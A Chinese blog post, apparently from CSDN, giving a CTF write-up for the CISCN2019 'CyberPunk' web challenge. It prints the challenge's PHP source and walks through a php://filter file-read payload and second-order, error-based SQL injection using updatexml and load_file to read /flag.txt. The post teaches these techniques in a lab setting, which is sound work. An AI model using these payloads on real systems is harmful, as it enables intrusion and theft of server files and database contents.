[CISCN2019 华北赛区 Day1 Web5]CyberPunk

最新推荐文章于 2024-05-13 16:17:54 发布
最新推荐文章于 2024-05-13 16:17:54 发布
阅读量144 收藏
点赞数
分类专栏: CTF WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K1ose/article/details/115156883
版权

访问页面,view-source一下,发现最下边有提示传参?file=
伪协议读一下源代码;

?file=php://filter/convert.base64-encode/resource=index.php

得到的base64值解码;
这里只提取php代码;

<?php
ini_set('open_basedir', '/var/www/html/');

// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
    if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
        echo('no way!');
        exit;
    }
    @include($file);
}
?>

还挺好的,直接用filter就饶过了;
看看其他文件的源代码;
search.php

<?php

require_once "config.php"; 

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        if(!$row) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

change.php

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

delete.php

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单删除成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

confirm.php

<?php

require_once "config.php";
//var_dump($_POST);

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = $_POST["address"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if($fetch->num_rows>0) {
        $msg = $user_name."已提交订单";
    }else{
        $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
        $re = $db->prepare($sql);
        $re->bind_param("sss", $user_name, $address, $phone);
        $re = $re->execute();
        if(!$re) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单提交成功";
    }
} else {
    $msg = "信息不全";
}
?>

在这几个函数中,发现$address参数受到了不公的待遇;
差别对待
$user_name$phone经过了正则匹配过滤,唯独$address做了一个简单的转义;
那我能不能就confirm一个恶意订单,然后search出来数据库的信息;
答案是否定的,因为search出来的并不会执行,但是change就不一样了;
search.php中,address仅仅是简单的打印出来而已;
而在change.php中,有:
在这里插入图片描述那么可以构造$address的内容为:
address' where user_id=updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)#

现在提交订单,在地址中写入payload;
接着修改订单,触发报错;

报错得到表名user

这个时候我就在想,这个数据库里是不是没有flag呢???
那flag或许是放在根目录或者其他地方,需要load_file来读;

重新构造payload;

address' where user_id=updatexml(1,concat(0x3a,(select(load_file('/flag')))),1)#

没有报错,反而修改成功,那应该是根目录上不存在这样的flag文件,加个.txt试试;

address' where user_id=updatexml(1,concat(0x3a,(select(load_file('/flag.txt')))),1)#

得到一部分flag
在这里插入图片描述
right()拿右边的值;
address' where user_id=updatexml(1,concat(0x3a,(select(right(load_file('/flag.txt'),30)))),1)#
在这里插入图片描述
flag{ac065bff-a5ab-4dfc-9808-02afca2c3048}

K1ose
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buu-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
qaq517384的博客
10-10 257
F12能看到提示 ?file猜测文件包含,先是伪协议读源码 ?file=php://filter/convert.base64-encode/resource=index.php <?php //index.php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file']) ? $_GET['file'] : null); if (isset($file)){
nssctf [CISCN 2019华北]PWN1
n1ght的博客
03-08 679
通过v1的值覆盖到v2的地址,将小数转成十六机制,发送使v2的值就等于11.2815。还有个思路就是我们覆盖返回地址为system("cat /flag")的地址。我们可以输入v1的值,当v2的值是11.28125的时候,查看文件内容。所以v1离v2的距离是0x30-0x4,并且11.2815的十六进制是。发现func函数,点进去查看函数具体代码。发现开启了栈不可执行和部分地址随机化。checksec查看保护机制。v1离rbp的距离是0x30。看到了逻辑,v2的值0.0。v2离rbp的距离是0x4。
[CISCN 2019华北]PWN1 CTF—PWN
最新发布
m0_72904009的博客
05-13 384
[CISCN 2019华北]PWN1 CTF—PWN
[CISCN 2019华北]PWN1
s_hiy_iyi的博客
11-03 130
v2的值给的是浮点数,需要转换成16进制的,十六进制值可以从汇编中找到。v1在栈中的地址是0x30到0x04,所以要覆盖的长度就是。
cyberpunk-web-page-webm
10-29
cyberpunk-web-page-webm
Cyberpunk2077_CYBERPUNK_CheatEngine_
09-29
1. **内存地址**:游戏中每个变量都在计算机内存中占据一个特定的位置,Cheat Engine就是通过找到这些地址来修改其值。 2. **扫描**:Cheat Engine提供多种扫描类型,如“快速扫描”、“模糊扫描”和“多值扫描”,...
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
02-05
"cyberpunk-2019"主题就是这样一个针对Emacs的定制化设计,旨在为用户提供一个具有未来感、仿赛博朋克风格的编辑环境。 赛博朋克(Cyberpunk)是一种流行于科幻文化中的子流派,通常与高科技、低生活、反乌托邦的...
重新记忆Web版:重新:记忆Web
02-06
《重新记忆Web版:重新:记忆Web版》是一款基于Web技术构建的文字冒险游戏,它巧妙地融合了赛博朋克的元素与Web组件技术。在这款游戏中,玩家将通过JavaScript、CSS和HTML的交互,体验一场独特的网络版记忆之旅。 ...
augmented-ui:赛博朋克风格的Web UI变得容易。 得到增强
04-13
http : //augmented-ui.com/v1/test.html unpkg: https ://unpkg.com/augmented-ui@1/augmented.css 安装: $ npm install augmented-ui /node_modules/augmented-ui/augmented-ui.min.css $ npm install ...
[CISCN2019 华北赛区 Day1 Web5]CyberPunk --不会编程的崽
不会编程的崽的博客
03-20 389
sql盲注,二次注入,sql语句读取文件
【PWN · ret2text】[CISCN 2019华北]PWN1
Mr_Fmnwon的博客
04-21 521
依旧是简单的ret2text。
某行业_CTF部分Writeup
Keepb1ue的博客
01-12 7366
目录WEB简单的Web足迹NoRCEGiveMeSecretMisc不止止base64失眠的夜High quality men WEB 简单的Web <?php highlight_file(__FILE__); error_reporting(0); echo "try to read source ?action="; $action = $_GET['action']; if (isset($action)) { if (p
用python的pillow写一个程序,将一个城市图片赛博朋克化
05-11
cyberpunk_image = cyberpunk_image.filter(ImageFilter.CONTOUR) # 保存处理后的图片 cyberpunk_image.save('cyberpunk_city.jpg') ``` 这个程序将原始城市图片转换为黑白,添加噪点,反转颜色,最后应用赛博朋克...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值